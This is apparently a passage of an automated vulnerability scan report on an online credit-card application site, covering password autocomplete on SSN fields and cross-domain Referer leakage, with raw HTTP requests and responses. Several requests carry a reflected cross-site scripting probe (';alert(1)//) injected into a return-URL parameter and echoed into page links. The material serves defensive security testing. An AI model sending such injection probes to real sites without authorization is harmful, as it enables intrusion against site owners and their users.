Set-cookie: JSESSIONID=cf19e46936a5309541f5645dbdf9; Path=/eapplygen2; Secure
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 22661


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...

3. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3DPLCC_new_v1%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_c2_apply%26ts%3Db2a5qy6gcohj49h3hcolu9vxpmcb5ex%26place%3Dhuc%26inc%3Dplcc6%26pr%3Dconplcc%26ad%3D6MC0%26plattr%3D6MPSAC%26imp%3DA336G5NZJ23B5Q&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:37 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 108209


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
<!-- PR70497 start -->
   <form name="eApplyForm" method="post" action="/eapplygen2/eApply.do" id="eApplyForm">
<!-- PR70497 end -->
...[SNIP]...
<!-- PR 90983ph4 changes starts -->
                   
                       <input type="password" name="ssn_0020_0" maxlength="3" size="3" value="" onkeypress="return isNumberKey(event)" class="app_field_inputtxt"> - <input type="password" name="ssn_0020_1" maxlength="2" size="2" value="" onkeypress="return isNumberKey(event)" class="app_field_inputtxt"> - <input type="password" name="ssn_0020_2" maxlength="4" size="4" value="" onkeypress="return isNumberKey(event)" class="app_field_inputtxt"><input type="hidden" name="ssn_0020" value="" />
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 7 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c628ed5120c5e547e9472fd49253

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:05 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 358
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<html>
<head>
<link rel="stylesheet" href="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/css/style.css" type="text/css">
</head>
   <script language="JavaScript" SRC="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/js/TermsConditions.js" height="100%"></script>
...[SNIP]...

4.2. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3Ddefault%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_g1_apply%26ts%3D7ptf9dgqk1wgu0lo0s64fem79s2r35v%26place%3Durl%26inc%3Dpoinvsp%26pr%3Dibprox%26ad%3D0001%26plattr%3Dnone%26imp%3DA8NVK8AAPHZBS&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:01 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 45075


<!--PR90699 Changes Starts -->

<!--PR90699 Changes Ends-->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Credit Line</title>
<link rel="stylesheet" href="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/css/style.css" type="text/css">

<script language="javascript" >
...[SNIP]...
<td class="app_logoimage">
   
       <img src="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/images/AppBussMCLogo.gif" alt='Amazon Commercial Services Business Credit Application' class="app_logoimage" />
   
       </td>
...[SNIP]...
</label>        

<a class="app_prfriendly_link" href="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/pdf/TermsConditions.pdf" target="_blank">
<span class="app_secheaderbody_txt">
...[SNIP]...
<td valign="top">
                   
                   <img src="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/images/padlock.gif" alt='This is a secure online application.'
bundle_group=""
bundle="amazoncmlInternetMessages" bundle_generic="generic_messages" />

                   
                   </td>
...[SNIP]...
<a id="appsubmitbutton" href="javascript:formSubmit('eapply.do',3001)" ><img src="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/images/agree_submit_button.gif" alt='Accept and Submit' border="0" /></a>
...[SNIP]...
</script>
<script language="JavaScript" src="https://chb.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf_eapply.js"></script>
<script language="JavaScript" src="https://chb.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf.js"></script>
<noscript><img src="https://gemoneySusrcfeapply.112.2O7.net/b/ss/gemoneySusrcfeapply1/H.3--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

4.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 16:09:44 GMT
X-powered-by: Servlet/2.5
Set-cookie: JSESSIONID=cf209e5ba73550128f2e147f9ff3; Path=/EApplyCommercial; Secure
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 10066


<!-- PR60796 Chanages start -->


<!-- PR60796 Chanages Ends -->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Cr
...[SNIP]...
</title>
<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/css/style.css" type="text/css">


</head>
...[SNIP]...
<td class="app_logoimage">
   
       <img src="https://cha.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/images/AppBussMCLogo.gif" alt='Amazon Commercial Services Business Credit Application' class="app_logoimage" />
   
       </td>
...[SNIP]...
<td class="res_returnimage">
           <a href="https://www.amazon.com/gp/cart/view.html1ed92';alert(1)//90191586b71"><img border="0" src="https://cha.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/images/return_button.jpg" /></a>
...[SNIP]...
</script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf_eapply.js"></script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf.js"></script>
<noscript><img src="https://gemoneySusrcfeapply.112.2O7.net/b/ss/gemoneySusrcfeapply1/H.3--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

4.4. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3Ddefault%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_g1_apply%26ts%3D7ptf9dgqk1wgu0lo0s64fem79s2r35v%26place%3Durl%26inc%3Dpoinvsp%26pr%3Dibprox%26ad%3D0001%26plattr%3Dnone%26imp%3DA8NVK8AAPHZBS&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Oct 2011 01:56:16 GMT
X-powered-by: Servlet/2.5
Set-cookie: JSESSIONID=f0b09c3f9a6cf05213f8226b3bb0; Path=/EApplyCommercial; Secure
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 9930


<!-- PR60796 Chanages start -->


<!-- PR60796 Chanages Ends -->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Cr
...[SNIP]...
</title>
<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/css/style.css" type="text/css">


</head>
...[SNIP]...
<td class="app_logoimage">
   
       <img src="https://cha.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/images/AppBussMCLogo.gif" alt='Amazon Commercial Services Business Credit Application' class="app_logoimage" />
   
       </td>
...[SNIP]...
<td class="res_returnimage">
           <a href="https://www.amazon.com/gp/cart/view.html"><img border="0" src="https://cha.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/images/return_button.jpg" /></a>
...[SNIP]...
</script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf_eapply.js"></script>
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/gem_us_rcf.js"></script>
<noscript><img src="https://gemoneySusrcfeapply.112.2O7.net/b/ss/gemoneySusrcfeapply1/H.3--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

4.5. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/jsp/application/Internet/AgreementSummary.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /eapplygen2/jsp/application/Internet/AgreementSummary.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c72aa8c1bf5b6aa482b7011b28b7

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:39 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 1929
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
<!-- PR91693 Abondanment popup -->


<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/css/style.css" type="text/css">


<script>
...[SNIP]...
<html>

<script language="JavaScript" SRC="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/js/TermsConditions.js" height="100%"></script>
...[SNIP]...

4.6. https://www.onlinecreditcenter2.com/eapplygen2/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html4a75e'%3balert(1)//b75b5387ba0&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.onlinecreditcenter2.com/eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html4a75e'%3balert(1)//b75b5387ba0&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 16:09:16 GMT
X-powered-by: Servlet/2.5
Set-cookie: JSESSIONID=cf19e46936a5309541f5645dbdf9; Path=/eapplygen2; Secure
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 22661


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
</HTML>

<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/css/style.css" type="text/css" />


   <!-- PR 80650 Starts -->
...[SNIP]...
<!-- Start IR: 6092647 -->
       
<img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/Clientlogo.gif" border="0" alt="www.amazon.com">
</a>
...[SNIP]...
<td class="res_header_image">
<img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/Applicationflow3.gif" alt="Application Results">

</td>
...[SNIP]...
<td class="app_processerr_img_col"><img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/processerr_smallcards.gif" alt="Amazon.com Store Card."></td>
...[SNIP]...
</span> <a
                               class="app_prfriendly_link"
                               href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/pdf/E-apply_App_Cons2.pdf" target="_blank">
<span class="app_processerr_txt">
...[SNIP]...
</span> <a href="https://www.amazon.com/gp/cart/view.html4a75e';alert(1)//b75b5387ba0"> <img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/processerror_ReturnToshopping.gif" border="0" alt="www.amazon.com"> </a>
...[SNIP]...
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" src="https://cha.onlinecreditcenter6.com/WebAnalyticsScripts/omniture.js"></script>
...[SNIP]...

4.7. https://www.onlinecreditcenter2.com/eapplygen2/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3DPLCC_new_v1%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_c2_apply%26ts%3Db2a5qy6gcohj49h3hcolu9vxpmcb5ex%26place%3Dhuc%26inc%3Dplcc6%26pr%3Dconplcc%26ad%3D6MC0%26plattr%3D6MPSAC%26imp%3DA336G5NZJ23B5Q&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:37 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 108209


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
<!-- Start IR: 6092647 -->

<img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/Clientlogo.gif" border="0" alt="www.amazon.com">
</a>
...[SNIP]...
<!--PR71295 end -->
<img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/Applicationflow1.gif" alt="You are on the application page for the Amazon.com Store Card.">
<!--PR71295 start -->
...[SNIP]...
<td><img src="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/images/spacer.gif" height="10"></td>
...[SNIP]...
<!-- PR91693 Abondanment popup -->


<link rel="stylesheet" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/css/style.css" type="text/css" />
<!--PR90513 Changes Starts-->
...[SNIP]...
</span>
    <a class="app_prfriendly_link" href="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/en/pdf/TermsConditions.pdf" target="_blank">
<span class="app_bordercross_link">
...[SNIP]...
<!-- PR60390 Ends -->


